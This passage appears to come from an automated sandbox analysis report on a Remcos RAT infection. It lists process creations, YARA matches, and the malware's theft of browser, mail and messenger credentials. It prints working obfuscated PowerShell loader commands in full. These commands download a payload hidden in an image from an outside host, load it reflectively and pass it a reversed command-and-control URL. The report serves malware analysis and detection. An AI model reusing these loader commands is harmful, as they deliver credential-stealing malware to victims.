reZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FFBK/0209/69.242.571.701//:ptth' , '1' , 'C:\ProgramData\' , 'sabelianos','RegAsm',''))} }" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\sabelianos.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\huqveuwntqlrmlybthcenbzzriklfmudg"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rwdne"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\briyfxzid"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jcpa"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\twutehs"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wyzefsckuj"
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremwdgtrevdgtredcdgtreoqdgtre3dgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtreodgtredgtre4dgtredidgtremdgtredgtreydgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.ffbk/0209/69.242.571.701//:ptth' , '1' , 'c:\programdata\' , 'sabelianos','regasm',''))} }"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremwdgtrevdgtredcdgtreoqdgtre3dgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtreodgtredgtre4dgtredidgtremdgtredgtreydgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.ffbk/0209/69.242.571.701//:ptth' , '1' , 'c:\programdata\' , 'sabelianos','regasm',''))} }" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00434C52 cpuid 28_2_00434C52
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 28_2_00452036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 28_2_004520C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 28_2_00452313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 28_2_00448404
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 28_2_0045243C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 28_2_00452543
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 28_2_00452610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoA, 28_2_0040F8D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 28_2_004488ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: IsValidCodePage,GetLocaleInfoW, 28_2_00451CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 28_2_00451F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 28_2_00451F9B
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0041B7FF GetSystemTimes,Sleep,GetSystemTimes,__aulldiv, 28_2_0041B7FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0041B60D GetComputerNameExW,GetUserNameW, 28_2_0041B60D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 28_2_00449190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0041739B GetVersionExW, 29_2_0041739B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.powershell.exe.4529110.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.powershell.exe.4529110.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000002.1114379537.0000000000571000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.1113827756.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.1114379537.0000000000555000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.568213344.0000000004346000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4380, type: MEMORYSTR
Contains functionality to steal Chrome passwords or cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 28_2_0040BA12
Contains functionality to steal Firefox passwords or cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 28_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \key3.db 28_2_0040BB30
Searches for Windows Mail specific files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
Tries to steal Mail credentials (via file / registry access)
